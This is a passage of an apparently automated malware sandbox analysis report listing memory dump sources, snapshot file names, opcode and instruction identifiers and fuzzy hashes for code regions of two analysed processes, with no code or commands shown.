                                                            • Instruction Fuzzy Hash: DB213A36B0D24D4EE331ABA898611EC7B60EF41325F0545B7D04C8E1D3D978268AC365
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7a6f40ee0fca21ba647fca8dbee232e039d11869350706fc39f68b34b5df1564
                                                            • Instruction ID: 8648de61f7e8f57a718017e7eb081baf93b370cab94679ef4afa1c951c6e2876
                                                            • Opcode Fuzzy Hash: 7a6f40ee0fca21ba647fca8dbee232e039d11869350706fc39f68b34b5df1564
                                                            • Instruction Fuzzy Hash: FE116330B0DA0E4FEAB8EBA884646B87393FF54700F0240B5D00ED72A2DD686D418650
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7666d2b8042b5748835df10e626df8f803f46709ecf54e51102bfe9d3dd031ec
                                                            • Instruction ID: 64c0efb8ededd9b7375937b6ffdca0a2f26b62b885ddb8f4c57290109e2e9230
                                                            • Opcode Fuzzy Hash: 7666d2b8042b5748835df10e626df8f803f46709ecf54e51102bfe9d3dd031ec
                                                            • Instruction Fuzzy Hash: 7311A721F1EA1E5BE7B4AB9884646F97293FF48710F1241B5D40EE31F2DEAC6E508690
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c14d556068efcbd86f8984d0b70db2656fd3b6f01bc13295a951514bc4abc4e3
                                                            • Instruction ID: a2eacee2af67270d7d6ed65f631c79649d44812de9c0e1e50a93be219136b662
                                                            • Opcode Fuzzy Hash: c14d556068efcbd86f8984d0b70db2656fd3b6f01bc13295a951514bc4abc4e3
                                                            • Instruction Fuzzy Hash: DD11ED3090892D8FDBA8DB08C494BA973E6EB54310F2541A9D44ED3271CF74AE85CB45
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 564822231bb6c42234dee17e41f32378687a040173cee5a43de2f162b6b4e145
                                                            • Instruction ID: 7d1f673562543a7625d65cf322dc3bd0157e476bbb80ed7df22ef99f9cfe7115
                                                            • Opcode Fuzzy Hash: 564822231bb6c42234dee17e41f32378687a040173cee5a43de2f162b6b4e145
                                                            • Instruction Fuzzy Hash: ED017021F1AA0D4FEFB8E7B8806967822C39F94700B0A00B5D00EC72F2ECB9AD418714
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 82a9f36e522e754ee400106d3f751e20abb237ded239e73501214674f7ada03f
                                                            • Instruction ID: 02e6b586664894bfd40054fb4812d7ea2db9dcc27b75b9830fb5ea75b05f2daf
                                                            • Opcode Fuzzy Hash: 82a9f36e522e754ee400106d3f751e20abb237ded239e73501214674f7ada03f
                                                            • Instruction Fuzzy Hash: 7E11A335B0E68D8EE721DFA8886119C7BB1EF42711F0645B7C088DB1A2D574164987A4
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d023ec2868f824baed77f8c41d73f85fca4a41eb64c5f3e21906c5ec20e96930
                                                            • Instruction ID: 9bf38bdb979dfdbe8453b08beff877560a5af44b111f6b5aaba68bb9f18d51f6
                                                            • Opcode Fuzzy Hash: d023ec2868f824baed77f8c41d73f85fca4a41eb64c5f3e21906c5ec20e96930
                                                            • Instruction Fuzzy Hash: 9B01A135B0E68D8FE722DFA8886419CBFB1EF42711F0645F7C088DB1A2D97466498764
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9482d04e698df129469b6ce84b973e261f9e59e91a21eceed696bb02a62e47df
                                                            • Instruction ID: 3e927211c3c7800c72d106962f86ee1e44214be734c1e76048084bc6e357b956
                                                            • Opcode Fuzzy Hash: 9482d04e698df129469b6ce84b973e261f9e59e91a21eceed696bb02a62e47df
                                                            • Instruction Fuzzy Hash: CE019235A0E38D9FD721DFA4885419CBFB1AF42710F1641E7D088DB1A2D9746645C754
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e13fa36616500ce40822b65a238d87a0679f7d9ca0cfcedc23b3f3403c21563d
                                                            • Instruction ID: 0faa1cc4696bb59613143b2fb120e16deb483ffc059ebe18adf0a15aeaeba8b3
                                                            • Opcode Fuzzy Hash: e13fa36616500ce40822b65a238d87a0679f7d9ca0cfcedc23b3f3403c21563d
                                                            • Instruction Fuzzy Hash: 2CF08634E1D91E8BEBB8AB94C8646F97362FB44311F1241B9C04ED31A1CE786E85CA50
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3fa5deb9a5086415271da76bfbc959ad367d11b27124175dab5c24a751fbde64
                                                            • Instruction ID: a9ce8ca3fe444f8aa684a8f1104411b1f7a58184a331befda5c01c2d4e37fcd5
                                                            • Opcode Fuzzy Hash: 3fa5deb9a5086415271da76bfbc959ad367d11b27124175dab5c24a751fbde64
                                                            • Instruction Fuzzy Hash: FE018F34E0E38D9FE731DFA488A419CBFB1AF06714F1541E7D488CB1A2D9786A44C755
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c5a5166a05d4dddd6093896ee635fbdfaa42f144d2c599d59639d2e65a03c69d
                                                            • Instruction ID: 23b68c343eb5c4d51036874e40bb3e09fba96bb1638325df0d59170fe52ac86f
                                                            • Opcode Fuzzy Hash: c5a5166a05d4dddd6093896ee635fbdfaa42f144d2c599d59639d2e65a03c69d
                                                            • Instruction Fuzzy Hash: 64E06561F1E81E5FF6B4A78884643B852D3EF6CB11F470172C40DD32A1DDA92D014794
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 8b6f1a43839b556c4ba731e042cc2b14c54ab8c9b26ce2780fa49dd05e4fb17f
                                                            • Instruction ID: 8c5228382921ab91ce032d795e32e0f8eb3ea2b1709bebf3ac00cfdd462bbd8b
                                                            • Opcode Fuzzy Hash: 8b6f1a43839b556c4ba731e042cc2b14c54ab8c9b26ce2780fa49dd05e4fb17f
                                                            • Instruction Fuzzy Hash: 71E06D21F1A81D5FE6F4A74C84253B862D3EB6C701F420176C00DC32A1DD682D024794
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6b30334a9b78f9b230578b5062510d1162a9f147521ec3b148683eabbdc3f545
                                                            • Instruction ID: 64bac5662ea4881fb5a8bcc897b89e737863e5645c1da0c4bf30722a1ef395d7
                                                            • Opcode Fuzzy Hash: 6b30334a9b78f9b230578b5062510d1162a9f147521ec3b148683eabbdc3f545
                                                            • Instruction Fuzzy Hash: 0CF0B431B0964E8EE7B8DF64C4906AD77E2EF54750F11417AD00DC32E5DA786680CA54
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc6c25c7992e3e5800fb7d14b4d8e949453d5709581ceaeb450938cd91efcb44
                                                            • Instruction ID: 43808d8f666e1dc4f9a90b4f9dd88d8e320c637c6c38f43af93ba1f5c88da300
                                                            • Opcode Fuzzy Hash: fc6c25c7992e3e5800fb7d14b4d8e949453d5709581ceaeb450938cd91efcb44
                                                            • Instruction Fuzzy Hash: 38E04F21F0682D2FE6B0A758C0643A85292EB6CB00F060172C40CC32A1DD6429428794
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9af5bc28fc2c0f0b71dd5e592dfd76922cbb1878aa8f2e7de69573f6f38a7678
                                                            • Instruction ID: 592830685c710e191fb463840f7aeedee90a1c284bcab971093a6569cda1cf6c
                                                            • Opcode Fuzzy Hash: 9af5bc28fc2c0f0b71dd5e592dfd76922cbb1878aa8f2e7de69573f6f38a7678
                                                            • Instruction Fuzzy Hash: C4E01220F0901E4BFBB4A794C8607B962A2AF99704F1640B4D80DD33E2DDB86F858755
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a694a85e57c89b96afa3afa0940e3ba856f579c8a2424d16d51d4f95c1ccaad7
                                                            • Instruction ID: bd3442ea4e735877b8db32a656f572c63090908754372b42d4afd2c019a513ff
                                                            • Opcode Fuzzy Hash: a694a85e57c89b96afa3afa0940e3ba856f579c8a2424d16d51d4f95c1ccaad7
                                                            • Instruction Fuzzy Hash: 1DE0EC24F0A90E4FEEA4FBA480786B822C39F94710F0A40B4D40EC71B2DDA8A9014720
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 410e05bf80eb868e35b7a61e13c3ebda97f337d5ee954246124ba18280ece236
                                                            • Instruction ID: 4ca0cf5f36246c5a70c8128036d966815203504818490876a24fa534440c4671
                                                            • Opcode Fuzzy Hash: 410e05bf80eb868e35b7a61e13c3ebda97f337d5ee954246124ba18280ece236
                                                            • Instruction Fuzzy Hash: 98C01210B5740D51D43473AEEC664EDB741AF4811CF864171E40D84096DC491587C1AA
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e3223773806dd1eeb8a33bfc36a23128a0ee8a43556ffbef35106e3682b1600
                                                            • Instruction ID: 951c45c2a0a23ea344f7b847046ce02511c6079dafc3ae047fc3d06edc29c598
                                                            • Opcode Fuzzy Hash: 2e3223773806dd1eeb8a33bfc36a23128a0ee8a43556ffbef35106e3682b1600
                                                            • Instruction Fuzzy Hash: 27C0123062A80E8FDA90BB68C889824BBA0FB0E201BDA00E0E04CC71A1D65A98908700
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000020.00000002.1980435687.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_32_2_7ffd9baa0000_SfLAFHFXIbHzHGgilQgXtKOw.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: c9$!k9$"s9$#{9
                                                            • API String ID: 0-1692736845
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: 5[_H
                                                            • API String ID: 0-3279724263
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bac3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bac3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bac3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: M
                                                            • API String ID: 0-3664761504
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: I
                                                            • API String ID: 0-3707901625
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bab0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bab0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bab0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAB0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bab0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6b994a4c199ed5a6ac0b2785444136facb194a242f590a9d60e94903d301e0cd
                                                            • Instruction ID: 92286fde73ac0b192ac3226c5b2ab647de754bbc09831e86d0e6c00c81bee134
                                                            • Opcode Fuzzy Hash: 6b994a4c199ed5a6ac0b2785444136facb194a242f590a9d60e94903d301e0cd
                                                            • Instruction Fuzzy Hash: 2A91F421B1DA4E0FEBA8EB5884767B973D2EF98354F0443B9E40DC72E7DD68A9458340
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bac3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7b7e910faa33f5aececaf36e9feeff2979c4e38ee750ebff0db8d37f64f06b92
                                                            • Instruction ID: 3f38580ef97b36419f6082f2ef630b7f954d73be71af7ea4916359d0005bf40d
                                                            • Opcode Fuzzy Hash: 7b7e910faa33f5aececaf36e9feeff2979c4e38ee750ebff0db8d37f64f06b92
                                                            • Instruction Fuzzy Hash: 7461D630B199094FDB59EB68C4A5AB973E2FF98314F1146B9E00DC72D6CE38E9428741
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAC3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC3000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bac3000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cd0307f103ac3baf04c07ebd6f92451abcb62e91360271285c2ec615aae7a1bc
                                                            • Instruction ID: f95778116b1f0252dba4c5eb1863393256a9ec1bd4f17d970f91721847734072
                                                            • Opcode Fuzzy Hash: cd0307f103ac3baf04c07ebd6f92451abcb62e91360271285c2ec615aae7a1bc
                                                            • Instruction Fuzzy Hash: B8419330B1890D8FDB55EF6DC458AA973E1FF98310F5102B9D01DC76E5CB39A9818780
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9baa0000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 49d52f98305bd6c8a9d9f33adfb291bb8dadb3a5ef6adcc5ba04f40c70285683
                                                            • Instruction ID: da832a57e59ceb861436cda4055b48d16484e73d12baf7c8a32d32319580f06a
                                                            • Opcode Fuzzy Hash: 49d52f98305bd6c8a9d9f33adfb291bb8dadb3a5ef6adcc5ba04f40c70285683
                                                            • Instruction Fuzzy Hash: BD412512B0C9590FE318B7BCA4A5AF87781EF5933AB1406FBE44ECB1E7CD14A8418284
                                                            Memory Dump Source
                                                            • Source File: 00000023.00000002.1985455082.00007FFD9BAD1000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD1000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_35_2_7ffd9bad1000_bridgeServerFontSavesMonitor.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c834f56c941669759944b2535218cf64922c7becfff37d9898d62163d396fec1
                                                            • Instruction ID: 133abc7c1e0dd37b8c2d8219c9b5a2c7f6f80df3527cc92c354329e991ec6726
                                                            • Opcode Fuzzy Hash: c834f56c941669759944b2535218cf64922c7becfff37d9898d62163d396fec1
                                                            • Instruction Fuzzy Hash: 5D311621B19D4E0FEBA4D75C98AA7A873D1EFA8750F8503BAE01DC71E2DD34B9414741
